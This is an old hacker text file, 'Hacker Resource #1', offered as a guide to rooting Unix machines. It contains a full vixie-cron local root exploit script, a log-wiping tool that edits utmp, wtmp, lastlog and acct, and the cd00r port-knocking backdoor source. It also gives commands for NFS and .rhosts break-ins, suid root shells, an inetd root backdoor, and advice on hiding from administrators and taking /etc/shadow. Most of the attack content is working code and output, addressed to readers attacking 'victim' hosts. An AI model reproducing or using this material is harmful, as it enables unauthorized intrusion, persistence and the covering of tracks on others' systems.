======================================================================= Title : Hacker Resource #1 Rls. ID : SLX2K001.TXT Author(s): sLash^ (sLash@securologix.com) Rls. Date: 15/10/00 Rls. Site: http://www.securologix.com ======================================================================= Greets to all RnD! ADM, LSD, Teso, ShadowPenguin, Mixter, w00w00, Insecurity (stanly) hope you still remember me. #49ers (rootenboy) you 0wn3d me b4 =), Deepcase (#ech0), too all eggdrop coder :\, Sekure.org, Lam3rz, 9x, UniG, b4b0, skrilla and all unf !@!#$%. And also too real coder and scriptkiddie out there. course, a big thanks to Necrose for our nice site, to my old friend reko clan IRCnet BILAL, Pisang and Roysan, to ex TNT crew form IRCNET, X-ORG and x-forces team members (1996). Special greetings to eLcc team members burnz ma first mastah, c0redump (wh0re mastah) =) if you fly to US again I'm gonna *santau* you :P, jeunu (my linux mastah), ijal if ya come again I'm gonna kiss ya =) and all members that I can't remember their name. Documentation are for all ppl's out there who wanna know a bit about UNIX security sh1t and etc. I just wanna share this, coz a lot of ppl's asked about it on the net. So guys, 3nj0y 1t Th1s sh1t f0r y4! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING You are about entering security documentation. 1. INTRODUCTION Well, howdi folks... I guess you are all wondering who's this guy (me) that's trying to show you a bit of everything... ? Well, I ain't telling you anything of that... Copyright, and other stuff like this (below). If you feel offended by this subject (hacking) or you think that you could do better, don't read the below information... This file is for educational purposes ONLY...;) I ain't responsible for any damages you made after reading this...(I'm very serious...) So this can be copied, but not modified (send me the changes, and if they are good, I'll include them ). Don't read it, 'cuz it might be illegal. I warned you... You'll learn some basic, simple and a bit hard tekneeq on how to r00t, h4ck or 0wn local and remote machine. First thing you need is, your PC :P =), *NIX Operating System or if ya don't have any your shell acc might be will help ya and basic computer language such perl, C or others. 2. Getting access Now, I'm going to show you an old tekneeq to gain access to remote machine by using export list. Now try looking for showmount file. Remember, you must be r00t to use this. othwersie, you'll get something like this show up on your shell... bash$ find / -name showmount find: /var/log/setup/tmp: Permission denied find: /var/spool/cron: Permission denied find: /var/spool/atjobs: Permission denied find: /var/spool/atspool: Permission denied find: /var/run/sudo: Permission denied ctrl-c with r00t access bash$ find / -name showmount /usr/sbin/showmount bash$ now try use this command bash$ /usr/sbin/showmount -e host.com RPC: Program not registered. If ya g0t this msg, it means *get hell outta from that host* or try other tekneeq which I'll show you later. Now, let's see what happen to host vur with this export list : bash$ /usr/sbin/showmount -e host.com /usr host.com /usr2 host2.com /home (everyone) /home2 host3.com /cdrom (everyone) kay, look to /home (everyone) <--- this means you can own this home directory. Yeah ph33r! =) now try this : bash$ mkdir /tmp/hack1 bash$ mount -t nfs host.com:/home /tmp/hack1/ bash$ ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 ita users 1024 Jun 22 19:18 ita/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 rina 100 1024 Jul 6 13:42 rina/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 intan/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 mangkuk/ Well, we wanna hack into mangkuk home. bash$ whoami;id;uname -a root uid=0(root) gid=0(root) groups=100(users) Linux ns 2.2.16 #97 Fri Jun 16 19:45:30 PDT 2000 i586 unknown bash$ echo "mangkuk::102:2::/tmp/hack1:/bin/sh" >> /etc/passwd Don't worry about the .bash_history will fix it later. bash$ su - mangkuk Welcome to mangkuk user. mysite:~>ls -lsa /tmp/hack1/ total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 ita users 1024 Jun 22 19:18 ita/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 rina 100 1024 Jul 6 13:42 rina/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 intan/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 mangkuk daemon 1024 Oct 20 18:57 mangkuk/ So we own this guy's home directory... bash$ echo "+ +" > /home/mangkuk/.rhosts or type pwd to check directory. bash$ cd / bash$ rlogin host.com or if you don't have rlogin try use bash$ rsh host.com Welcome to host.Com. SunOs ver....(crap). host.com$ This is the first old method that I always do.. Another method could be to see if the site has an open port. That would mean we have chance to get an access coz it usually vulnerable. You can get port scanner on the net or use NMAP is better I think. Go to www.insecure.org and say thanks to Fydor :\ =) Now, let's see and r0x our sencond host.com bash$ nmap host2.com Starting nmap V. 2.54BETA5 ( www.insecure.org/nmap/ ) Interesting ports on host2.com (ip ere): (The 1513 ports scanned but not shown below are in state: closed) Port State Service 1/tcp open tcpmux 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 79/tcp open finger 80/tcp open http 98/tcp open linuxconf 110/tcp open pop-3 111/tcp open sunrpc 113/tcp open auth 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 513/tcp open login 514/tcp open shell 982/tcp filtered unknown 1024/tcp open kdm 1517/tcp open vpac 3128/tcp open squid-http 7100/tcp open font-service Nmap run completed -- 1 IP address (1 host up) scanned in 32 seconds bash$ Looks like host2.com open his 110 service. And that's bad coz we can get r00t from that service. Let's see what happens.... bash$ ./pop3 host2.com QPOP 3.0b AUTH overflow (linux x86) [uDc] : [0xbfffd150] : unsuccessful. [uDc] : [0xbfffd344] : unsuccessful. [uDc] : [0xbfffd538] : successful. k4b0ooooOOOOoooOOOooo0mmmmmm L3t's d4nc3 !!! =) uid=0(root) gid=0(root) groups=0(root) Linux host2.com 2.2.12-20krsmp #1 Thu May 18 19:51:22 JST 2000 i586 unknown Directory set to / Note: This sploit will never give you a prompt Looks like we g0t r00t =) Now, let's make some nice backdoor Change the games passwd passwd games Changing password for games Enter the new password (minimum of 5, maximum of 127 characters) Please use a combination of upper and lower case letters and numbers. New password: Re-enter new password: Password changed. cp /bin/sh /bin/load chmod a+s /bin/load quit bash$ What I'm tryin to do is make a simple root backdoor command. In this case command I was created 'load'. Now telnet to host2.com bash$ telnet host2.com Trying host2.com... Connected to host2.com. Escape character is '^]'. ALZZA Linux release 6.1 (Linux One) Kernel 2.2.12-20krsmp on an i686 login:games password: Sat Oct 14 03:54:07 games@host2.com$ load games@host2.com# whoami;id root uid=2(games) gid=2(games) euid=0(root) egid=0(root) groups=2(games) games@host2.com# Now you need a suid.c to make our uid=0 and gid=0 Here's the code.. -cut- main(argc,argv) int argc; char *argv[]; { setuid(0); setgid(0); system("/bin/sh"); } -cut- compile this suid.c at /bin direcotry games@host2.com# pwd /bin games@host2.com# cc suid.c -o crap games@host2.com# rm suid.c don't keep any *.c file on your rooted machine just save it on your own pc =) Now try type 'crap' and see what happens. games@host2.com# crap bash# whoami;id root uid=0(root) gid=0(root) groups=0(root) bash# EOF_ Remember, DO NOT adduser or any login on your rooted machine coz 'adduser' might help your rooted admin think that his system was hacked by somebody. You are going to use 'games' login to access your rooted machine and your backdoor shell where I'll show you in step 4 'Keeping access'. 0k3y p4l n0w ya g0t y0ur r00t b0x n0w. 3nj0y! We are going to next step. 3. Hacking Local r00t In this section, you'll learning to root local root. It's means you have an account on your victim machine. You just want to gain a root access. Now, I will point to Linux rooting ere. There's a lot of sploit out there. I'm going to show you an old bugs on Linux system. It's not really old but it's r0x =) victim.com$ id;uname -a uid=1012(me) gid=100(users) groups=100(users) Linux ns 2.2.16 #97 Fri Jun 16 19:45:30 PDT 2000 i586 unknown victim.com$ ls -lsa /usr/bin/crontab 12 -rws--x--x 1 root bin 10192 Jun 19 09:55 /usr/bin/crontab ----------------cut---------------- #!/bin/sh clear echo '------------------------------------------------------------------' echo 'Marchew Hyperreal Industries ' echo 'Stumilowy Las Team <100milowy@gdynia.ids.pl>' echo '---------------------------- presents ----------------------------' echo echo ' -= vixie-cron root sploit by Michal Zalewski =-' echo echo '[+] Checking dependencies:' echo -n ' [*] vixie crontab: ' if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then echo "OK" else echo "NOT FOUND!" exit 1 fi echo -n ' [*] Berkeley Sendmail: ' if [ -f /usr/sbin/sendmail ]; then echo "OK" else echo "NOT FOUND!" exit 1 fi echo -n ' [*] gcc compiler: ' if [ -x /usr/bin/gcc ]; then echo "OK" else echo "NOT FOUND!" exit 1 fi echo ' [?] Dependiences not verified:' echo ' [*] proper version of vixie crontab' echo ' [*] writable /tmp without noexec/nosuid option' echo '[+] Exploit started.' echo "[+] Setting up .cf file for sendmail..." cat >/tmp/vixie-cf <<__eof__ V7/Berkeley O QueueDirectory=/tmp O DefaultUser=0:0 R$+ \$#local $: \$1 regular local names Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40, T=DNS/RFC822/X-Unix, A=vixie-root __eof__ echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...' cat >/tmp/vixie-root <<__eof__ #!/bin/sh gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d chmod 6755 /tmp/vixie-own3d __eof__ chmod 755 /tmp/vixie-root echo '[+] Setting up phase #2 tool (rootshell launcher)...' cat >/tmp/vixie-own3d.c <<__eof__ main() { setuid(0); setgid(0); unlink("/tmp/vixie-own3d"); execl("/bin/sh","sh","-i",0); } __eof__ echo '[+] Putting evil crontab entry...' crontab - <<__eof__ MAILTO='-C/tmp/vixie-cf dupek' * * * * * nonexist __eof__ echo '[+] Patience is a virtue... Wait up to 60 seconds.' ILE=0 echo -n '[+] Tick.' while [ $ILE -lt 50 ]; do sleep 2 let ILE=ILE+1 test -f /tmp/vixie-own3d && ILE=1000 echo -n '.' done echo echo '[+] Huh, done. Removing crontab entry...' crontab -r echo '[+] Removing helper files...' rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null echo '[*] And now...' if [ -f /tmp/vixie-own3d ]; then echo '[+] Entering root shell, babe :)' echo /tmp/vixie-own3d echo else echo '[-] Oops, no root shell found, patched system or configuration problem :(' fi echo '[*] Exploit done.' ----------------cut---------------- victim.com$ sh rootcron.sh ------------------------------------------------------------------ Marchew Hyperreal Industries Stumilowy Las Team <100milowy@gdynia.ids.pl> ---------------------------- presents ---------------------------- -= vixie-cron root sploit by Michal Zalewski =- [+] Checking dependencies: [*] vixie crontab: OK [*] Berkeley Sendmail: OK [*] gcc compiler: OK [?] Dependiences not verified: [*] proper version of vixie crontab [*] writable /tmp without noexec/nosuid option [+] Exploit started. [+] Setting up .cf file for sendmail... [+] Setting up phase #1 tool (phase #2 tool compiler)... [+] Setting up phase #2 tool (rootshell launcher)... [+] Putting evil crontab entry... [+] Patience is a virtue... Wait up to 60 seconds. [+] Tick..................................................... [+] Huh, done. Removing crontab entry... crontab 2.3.2 crontab file replace crontab from file crontab - replace crontab from stdin crontab -u user specify user crontab -l [user] list crontab for user crontab -e [user] edit crontab for user crontab -d [user] delete crontab for user crontab -c dir specify crontab directory [+] Removing helper files... [*] And now... [+] Entering root shell, babe :) bash# whoami;id root uid=0(root) gid=0(root) groups=0(root) bash# Or you might try other sploit. I'm not going put other sploit ere coz fuckin tired ere besides i'm too lazy :P to do that :P. All you have to do is check the www.securityfocus.com and join the mailing list so you know that a certain machine got a new bugs. When I say *bugs* it means new sploit would be release. And this is good coz we'll get a new fresh sploit to r0x our new victim machine =) Or you can try other site. But I like http://www.hack.co.za coz it's really r0x and updated everyday =) What I'm tryin to tell you is don't keep the hacking news leave you behind =P 4. Keeping access Once you gor root access of couse you need to maintain it so the admin don't recognize or know that his b0x was rooted by you. Other things you have to do is to clean all logs. And try install a nice trojan and rootkit. You can find it on the web or http://packetstorm.securify.com I'm not going to put a trojan or rootkit ere coz it's might make some damage :P What I'm going to show you know is to hide your self on your rooted machine. Now create a directory somewhere deeper that system admin can't find it :P Lets try this directory : bash# mkdir /usr/sbin/". " bash# chmod 0600 /usr/sbin/". " bash# cd /usr/sbin/"." Note: this ". " directory are pretty nice. when you do a ls -lsa cmd it will hide to something similar on current directory. Now let's check who's logged on our rooted machine bash# w 8:52am up 16 days, 12:11, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT games pts/0 -cut- 6:22am 0.00s 0.80s ? - bash# Lets hide ourself.... ----------------cut---------------- #include #include #include #ifndef NO_ACCT #include #endif #include #include #include #include #include #include #include #include #include #ifdef HAVE_LASTLOG_H #include #endif #ifdef HAVE_UTMPX #include #endif #ifndef UTMP_FILE #ifdef _PATH_UTMP #define UTMP_FILE _PATH_UTMP #else #define UTMP_FILE "/var/adm/utmp" #endif #endif #ifndef WTMP_FILE #ifdef _PATH_WTMP #define WTMP_FILE _PATH_WTMP #else #define WTMP_FILE "/var/adm/wtmp" #endif #endif #ifndef LASTLOG_FILE #ifdef _PATH_LASTLOG #define LASTLOG_FILE _PATH_LASTLOG #else #define LASTLOG_FILE "/var/adm/lastlog" #endif #endif #ifndef ACCT_FILE #define ACCT_FILE "/var/adm/pacct" #endif #ifdef HAVE_UTMPX #ifndef UTMPX_FILE #define UTMPX_FILE "/var/adm/utmpx" #endif #ifndef WTMPX_FILE #define WTMPX_FILE "/var/adm/wtmpx" #endif #endif /* HAVE_UTMPX */ #define BUFFSIZE 8192 /* * This function will copy the src file to the dst file. */ void copy_file(char *src, char *dst) { int fd1, fd2; int n; char buf[BUFFSIZE]; if ( (fd1 = open(src, O_RDONLY)) < 0 ) { fprintf(stderr, "ERROR: Opening %s during copy.\n", src); return; } if ( (fd2 = open(dst, O_WRONLY | O_CREAT | O_TRUNC)) < 0 ) { fprintf(stderr, "ERROR: Creating %s during copy.\n", dst); return; } while ( (n = read(fd1, buf, BUFFSIZE)) > 0) if (write(fd2, buf, n) != n) { fprintf(stderr, "ERROR: Write error during copy.\n"); return; } if (n < 0) { fprintf(stderr, "ERROR: Read error during copy.\n"); return; } close(fd1); close(fd2); } /* * UTMP editing. */ void wipe_utmp(char *who, char *line) { int fd1; struct utmp ut; printf("Patching %s .... ", UTMP_FILE); fflush(stdout); /* * Open the utmp file. */ if ( (fd1 = open(UTMP_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", UTMP_FILE); return; } /* * Copy utmp file excluding relevent entries. */ while ( read(fd1, &ut, sizeof(ut)) > 0) if ( !strncmp(ut.ut_name, who, strlen(who)) ) if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) { bzero((char *) &ut, sizeof(ut)); lseek(fd1, (int) -sizeof(ut), SEEK_CUR); write(fd1, &ut, sizeof(ut)); } close(fd1); printf("Done.\n"); } /* * UTMPX editing if supported. */ #ifdef HAVE_UTMPX void wipe_utmpx(char *who, char *line) { int fd1; struct utmpx utx; printf("Patching %s .... ", UTMPX_FILE); fflush(stdout); /* * Open the utmp file and temporary file. */ if ( (fd1 = open(UTMPX_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", UTMPX_FILE); return; } while ( (read(fd1, &utx, sizeof(utx)) ) > 0) if ( !strncmp(utx.ut_name, who, strlen(who)) ) if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) { bzero((char *) &utx, sizeof(utx)); lseek(fd1, (int) -sizeof(utx), SEEK_CUR); write(fd1, &utx, sizeof(utx)); } close(fd1); printf("Done.\n"); } #endif /* * WTMP editing. */ void wipe_wtmp(char *who, char *line) { int fd1; struct utmp ut; printf("Patching %s .... ", WTMP_FILE); fflush(stdout); /* * Open the wtmp file and temporary file. */ if ( (fd1 = open(WTMP_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", WTMP_FILE); return; } /* * Determine offset of last relevent entry. */ lseek(fd1, (long) -(sizeof(ut)), SEEK_END); while ( (read (fd1, &ut, sizeof(ut))) > 0) { if (!strncmp(ut.ut_name, who, strlen(who))) if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) { bzero((char *) &ut, sizeof(ut)); lseek(fd1, (long) -(sizeof(ut)), SEEK_CUR); write(fd1, &ut, sizeof(ut)); break; } lseek(fd1, (long) -(sizeof(ut) * 2), SEEK_CUR); } close(fd1); printf("Done.\n"); } /* * WTMPX editing if supported. */ #ifdef HAVE_UTMPX void wipe_wtmpx(char *who, char *line) { int fd1; struct utmpx utx; printf("Patching %s .... ", WTMPX_FILE); fflush(stdout); /* * Open the utmp file and temporary file. */ if ( (fd1 = open(WTMPX_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", WTMPX_FILE); return; } /* * Determine offset of last relevent entry. */ lseek(fd1, (long) -(sizeof(utx)), SEEK_END); while ( (read (fd1, &utx, sizeof(utx))) > 0) { if (!strncmp(utx.ut_name, who, strlen(who))) if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) { bzero((char *) &utx, sizeof(utx)); lseek(fd1, (long) -(sizeof(utx)), SEEK_CUR); write(fd1, &utx, sizeof(utx)); break; } lseek(fd1, (int) -(sizeof(utx) * 2), SEEK_CUR); } close(fd1); printf("Done.\n"); } #endif /* * LASTLOG editing. */ void wipe_lastlog(char *who, char *line, char *timestr, char *host) { int fd1; struct lastlog ll; struct passwd *pwd; struct tm *tm; char str[4]; printf("Patching %s .... ", LASTLOG_FILE); fflush(stdout); tm = (struct tm *) malloc( sizeof(struct tm) ); /* * Open the lastlog file. */ if ( (fd1 = open(LASTLOG_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", LASTLOG_FILE); return; } if ( (pwd = getpwnam(who)) == NULL) { fprintf(stderr, "ERROR: Can't find user in passwd.\n"); return; } lseek(fd1, (long) pwd->pw_uid * sizeof(struct lastlog), 0); bzero((char *) &ll, sizeof(ll)); if (line) strncpy(ll.ll_line, line, strlen(line)); if (timestr) { /* YYMMddhhmm */ if (strlen(timestr) != 10) { fprintf(stderr, "ERROR: Time format is YYMMddhhmm.\n"); return; } /* * Extract Times. */ str[2] = 0; str[0] = timestr[0]; str[1] = timestr[1]; tm->tm_year = atoi(str); str[0] = timestr[2]; str[1] = timestr[3]; tm->tm_mon = atoi(str) - 1; str[0] = timestr[4]; str[1] = timestr[5]; tm->tm_mday = atoi(str); str[0] = timestr[6]; str[1] = timestr[7]; tm->tm_hour = atoi(str); str[0] = timestr[8]; str[1] = timestr[9]; tm->tm_min = atoi(str); tm->tm_sec = 0; ll.ll_time = mktime(tm); } if (host) strncpy(ll.ll_host, host, sizeof(ll.ll_host)); write(fd1, (char *) &ll, sizeof(ll)); close(fd1); printf("Done.\n"); } #ifndef NO_ACCT /* * ACCOUNT editing. */ void wipe_acct(char *who, char *line) { int fd1, fd2; struct acct ac; char ttyn[50]; struct passwd *pwd; struct stat sbuf; char *tmpf; printf("Patching %s .... ", ACCT_FILE); fflush(stdout); /* * Open the acct file and temporary file. */ if ( (fd1 = open(ACCT_FILE, O_RDONLY)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", ACCT_FILE); return; } /* * Grab a unique temporary filename. */ tmpf = tmpnam((char *) NULL); if ( (fd2 = open(tmpf, O_WRONLY | O_CREAT | O_TRUNC, 600)) < 0 ) { fprintf(stderr, "ERROR: Opening tmp ACCT file\n"); return; } if ( (pwd = getpwnam(who)) == NULL) { fprintf(stderr, "ERROR: Can't find user in passwd.\n"); return; } /* * Determine tty's device number */ strcpy(ttyn, "/dev/"); strcat(ttyn, line); if (stat(ttyn, &sbuf) < 0) { fprintf(stderr, "ERROR: Determining tty device number.\n"); return; } while ( read(fd1, &ac, sizeof(ac)) > 0 ) { if ( !(ac.ac_uid == pwd->pw_uid && ac.ac_tty == sbuf.st_rdev) ) write(fd2, &ac, sizeof(ac)); } close(fd1); close(fd2); copy_file(tmpf, ACCT_FILE); if ( unlink(tmpf) < 0 ) { fprintf(stderr, "ERROR: Unlinking tmp WTMP file.\n"); return; } printf("Done.\n"); } #endif void usage() { printf("USAGE: wipe [ u|w|l|a ] ...options...\n"); printf("\n"); printf("UTMP editing:\n"); printf(" Erase all usernames : wipe u [username]\n"); printf(" Erase one username on tty: wipe u [username] [tty]\n"); printf("\n"); printf("WTMP editing:\n"); printf(" Erase last entry for user : wipe w [username]\n"); printf(" Erase last entry on tty : wipe w [username] [tty]\n"); printf("\n"); printf("LASTLOG editing:\n"); printf(" Blank lastlog for user : wipe l [username]\n"); printf(" Alter lastlog entry : wipe l [username] [tty] [time] [host]\n"); printf(" Where [time] is in the format [YYMMddhhmm]\n"); printf("\n"); #ifndef NO_ACCT printf("ACCT editing:\n"); printf(" Erase acct entries on tty : wipe a [username] [tty]\n"); #endif exit(1); } int main(int argc, char *argv[]) { char c; if (argc < 3) usage(); /* * First character of first argument determines which file to edit. */ c = toupper(argv[1][0]); /* * UTMP editing. */ switch (c) { /* UTMP */ case 'U' : if (argc == 3) wipe_utmp(argv[2], (char *) NULL); if (argc ==4) wipe_utmp(argv[2], argv[3]); #ifdef HAVE_UTMPX if (argc == 3) wipe_utmpx(argv[2], (char *) NULL); if (argc == 4) wipe_utmpx(argv[2], argv[3]); #endif break; /* WTMP */ case 'W' : if (argc == 3) wipe_wtmp(argv[2], (char *) NULL); if (argc == 4) wipe_wtmp(argv[2], argv[3]); #ifdef HAVE_UTMPX if (argc == 3) wipe_wtmpx(argv[2], (char *) NULL); if (argc == 4) wipe_wtmpx(argv[2], argv[3]); #endif break; /* LASTLOG */ case 'L' : if (argc == 3) wipe_lastlog(argv[2], (char *) NULL, (char *) NULL, (char *) NULL); if (argc == 4) wipe_lastlog(argv[2], argv[3], (char *) NULL, (char *) NULL); if (argc == 5) wipe_lastlog(argv[2], argv[3], argv[4], (char *) NULL); if (argc == 6) wipe_lastlog(argv[2], argv[3], argv[4], argv[5]); break; #ifndef NO_ACCT /* ACCT */ case 'A' : if (argc != 4) usage(); wipe_acct(argv[2], argv[3]); break; #endif } return(0); } ----------------cut---------------- bash# cc clean.c -o clean type clean and you'll see a manual appear on your screen or do this : bash# clean u games Patching.... Done. bash# clean w games Patching.... Done. bash# clean l games localhost Patching.... Done. bash# w USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bash# Looks like no one logged :D Not at all, it's hide from finger too =). Now, we need a daemon backdoor to keep our access more safe or something that admin don't know if he remove our 'games' login. Try his backdoor it's really r0x :P bash# echo 'utcp 10101 # Utcp Networking' >>/etc/services bash# echo 'utcp stream tcp nowait root /bin/sh -i >>/etc/inetd.conf bash# killall -HUP inetd Now try telnet to your rooted b0x on 10101 port from other machine Lets see what happens : host.com$ telnet host2.com 10101 Trying host2.com... Connected to host2.com. Escape character is '^]'. bash# id;uname uid=0(root) gid=0(root) groups=0(root) Linux ns 2.2.12-20krsmp #97 Fri Jun 16 19:45:30 PDT 2000 i586 unknown bash# bash# exit Connection closed by foreign host. host.com$ We have a backdoor shell now. You can try other backdoor if you want try this sploit for your second backdoor shell =) ----------------cut---------------- /* Code by Phenoelit - gcc -DDEBUG -o -I/where/ever/bpf -L/where/ever/bpf cd00r.c -lpcap */ #define CDR_INTERFACE "eth0" #define CDR_ADDRESS "your-ip" #define CDR_PORTS "your-backdoor-port" #define CDR_CODERESET #define CDR_SENDER_ADDR #define CDR_NOISE_COMMAND "uDc" #include #include #include #include #include #include /* for IPPROTO_bla consts */ #include /* for inet_ntoa() */ #include /* for inet_ntoa() */ #include /* for gethostbyname() */ #include /* for wait() */ #include /* for wait() */ #include #include #define ETHLENGTH 14 #define IP_MIN_LENGTH 20 #define CAPLENGTH 98 struct iphdr { u_char ihl:4, /* header length */ version:4; /* version */ u_char tos; /* type of service */ short tot_len; /* total length */ u_short id; /* identification */ short off; /* fragment offset field */ u_char ttl; /* time to live */ u_char protocol; /* protocol */ u_short check; /* checksum */ struct in_addr saddr; struct in_addr daddr; /* source and dest address */ }; struct tcphdr { unsigned short int src_port; unsigned short int dest_port; unsigned long int seq_num; unsigned long int ack_num; unsigned short int rawflags; unsigned short int window; long int crc_a_urgent; long int options_a_padding; }; unsigned int cports[] = CDR_PORTS; int cportcnt = 0; /* which is the next required port ? */ int actport = 0; #ifdef CDR_SENDER_ADDR struct in_addr sender; #endif CDR_SENDER_ADDR void cdr_open_door(void) { FILE *f; char *args[] = {"/usr/sbin/inetd","/tmp/.ind",NULL}; switch (fork()) { case -1: #ifdef DEBUG printf("fork() failed ! Fuck !\n"); #endif DEBUG return; case 0: /* To prevent zombies (inetd-zombies look quite stupid) we do * a second fork() */ switch (fork()) { case -1: _exit(0); case 0: /*that's fine */ break; default: _exit(0); } break; default: wait(NULL); return; } if ((f=fopen("/tmp/.ind","a+t"))==NULL) return; fprintf(f,"5002 stream tcp nowait root /bin/sh sh\n"); fclose(f); execv("/usr/sbin/inetd",args); #ifdef DEBUG printf("Strange return from execvp() !\n"); #endif DEBUG exit (0); } /* error function for pcap lib */ void capterror(pcap_t *caps, char *message) { pcap_perror(caps,message); exit (-1); } /* signal counter/handler */ void signal_handler(int sig) { /* the ugly way ... */ _exit(0); } void *smalloc(size_t size) { void *p; if ((p=malloc(size))==NULL) { exit(-1); } memset(p,0,size); return p; } int main (int argc, char **argv) { /* variables for the pcap functions */ #define CDR_BPF_PORT "port " #define CDR_BPF_ORCON " or " char pcap_err[PCAP_ERRBUF_SIZE]; /* buffer for pcap errors */ pcap_t *cap; /* capture handler */ bpf_u_int32 network,netmask; struct pcap_pkthdr *phead; struct bpf_program cfilter; /* the compiled filter */ struct iphdr *ip; struct tcphdr *tcp; u_char *pdata; /* for filter compilation */ char *filter; char portnum[6]; /* command line */ int cdr_noise = 0; /* the usual int i */ int i; /* for resolving the CDR_ADDRESS */ #ifdef CDR_ADDRESS struct hostent *hent; #endif CDR_ADDRESS /* check for the one and only command line argument */ if (argc>1) { if (!strcmp(argv[1],CDR_NOISE_COMMAND)) cdr_noise++; else exit (0); } /* resolve our address - if desired */ #ifdef CDR_ADDRESS if ((hent=gethostbyname(CDR_ADDRESS))==NULL) { if (cdr_noise) fprintf(stderr,"gethostbyname() failed\n"); exit (0); } #endif CDR_ADDRESS /* count the ports our user has #defined */ while (cports[cportcnt++]); cportcnt--; #ifdef DEBUG printf("%d ports used as code\n",cportcnt); #endif DEBUG if (cports[0]) { memset(&portnum,0,6); sprintf(portnum,"%d",cports[0]); filter=(char *)smalloc(strlen(CDR_BPF_PORT)+strlen(portnum)+1); strcpy(filter,CDR_BPF_PORT); strcat(filter,portnum); } else { if (cdr_noise) fprintf(stderr,"NO port code\n"); exit (0); } for (i=1;ilen<=(ETHLENGTH+IP_MIN_LENGTH)) continue; /* make it an ip packet */ ip=(struct iphdr *)(pdata+ETHLENGTH); /* if the packet is not IPv4, continue */ if ((unsigned char)ip->version!=4) continue; /* make it TCP */ tcp=(struct tcphdr *)(pdata+ETHLENGTH+((unsigned char)ip->ihl*4)); /* FLAG check's - see rfc793 */ /* if it isn't a SYN packet, continue */ if (!(ntohs(tcp->rawflags)&0x02)) continue; /* if it is a SYN-ACK packet, continue */ if (ntohs(tcp->rawflags)&0x10) continue; #ifdef CDR_ADDRESS /* if the address is not the one defined above, let it be */ if (hent) { #ifdef DEBUG if (memcmp(&ip->daddr,hent->h_addr_list[0],hent->h_length)) { printf("Destination address mismatch\n"); continue; } #else if (memcmp(&ip->daddr,hent->h_addr_list[0],hent->h_length)) continue; #endif DEBUG } #endif CDR_ADDRESS /* it is one of our ports, it is the correct destination * and it is a genuine SYN packet - let's see if it is the RIGHT * port */ if (ntohs(tcp->dest_port)==cports[actport]) { #ifdef DEBUG printf("Port %d is good as code part %d\n",ntohs(tcp->dest_port), actport); #endif DEBUG #ifdef CDR_SENDER_ADDR /* check if the sender is the same */ if (actport==0) { memcpy(&sender,&ip->saddr,4); } else { if (memcmp(&ip->saddr,&sender,4)) { /* sender is different */ actport=0; #ifdef DEBUG printf("Sender mismatch\n"); #endif DEBUG continue; } } #endif CDR_SENDER_ADDR /* it is the rigth port ... take the next one * or was it the last ??*/ if ((++actport)==cportcnt) { cdr_open_door(); actport=0; } } else { #ifdef CDR_CODERESET actport=0; #endif CDR_CODERESET continue; } } /* end of main loop */ return 0; } ----------------cut---------------- Well, folks we have done with our hacking *thingie*. You can do sniffing too on your rooted machine. Try search it on the net coz sniff might help ya to collect more passwd from other machine :D Remember to get the shadow file it's located on /etc/shadow on Linux machine. It's for your backup login if the system admin killed your login and backdoor. Thats all for now folks. Enjoy your rooted b0x. Happy hunting. My first 'Hacking Guide' Maybe I'll do better next time, and if I have more time I'll add about 1000 (more) other exploits, remote ones, new stuff, new techniques, etc... See ya! ======================================================================= Securologix - Security Research Team http://www.securologix.com =======================================================================